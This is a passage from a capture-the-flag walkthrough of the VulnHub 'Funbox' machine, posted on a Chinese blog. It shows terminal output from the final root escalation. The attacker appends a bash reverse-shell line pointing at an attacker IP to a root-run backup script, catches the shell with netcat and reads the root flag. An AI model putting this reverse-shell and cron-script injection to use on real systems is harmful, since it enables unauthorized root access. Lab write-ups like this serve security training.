cat .backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
www-data@funbox:/home/funny$ which nano
which nano
/usr/bin/nano
www-data@funbox:/home/funny$ nano .backup.sh
nano .backup.sh
Error opening terminal: unknown.
www-data@funbox:/home/funny$ echo 'bash -i >& /dev/tcp/192.168.56.146/9999 0>&1' >> .backup.sh
<>& /dev/tcp/192.168.56.146/9999 0>&1' >> .backup.sh
www-data@funbox:/home/funny$ cat .backup.sh
cat .backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
bash -i >& /dev/tcp/192.168.56.146/9999 0>&1
┌──(kali?kali)-[~/Desktop/Vulnhub/Funbox]
└─$ sudo nc -nlvp 9999
[sudo] password for kali:
listening on [any] 9999 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.164] 35070
bash: cannot set terminal process group (2518): Inappropriate ioctl for device
bash: no job control in this shell
root@funbox:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@funbox:~# cd /root
cd /root
root@funbox:~# ls
ls
flag.txt
mbox
snap
root@funbox:~# cat flag.txt
cat flag.txt
Great ! You did it...
FUNBOX - made by @0815R2d2
root@funbox:~#
至此實作了root提權,并拿到了root flag
STRIVE FOR PROGRESS,NOT FOR PERFECTION轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/551908.html
標籤:其他
上一篇:如何利用Requestly提升前端開發與測驗的效率,讓你事半功倍?
下一篇:返回列表